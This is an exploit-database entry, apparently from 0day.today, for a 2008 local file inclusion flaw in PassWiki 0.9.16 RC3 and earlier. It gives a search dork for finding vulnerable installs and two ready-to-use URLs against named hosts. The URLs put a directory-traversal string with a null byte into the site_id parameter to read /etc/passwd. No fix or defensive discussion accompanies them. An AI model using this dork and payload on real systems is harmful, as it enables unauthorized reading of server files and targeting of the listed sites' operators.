PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability

2008-05-31T00:00:00
ID 1337DAY-ID-3092
Type zdt
Reporter mozi
Modified 2008-05-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability
===================================================================



dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2018-02-19]  #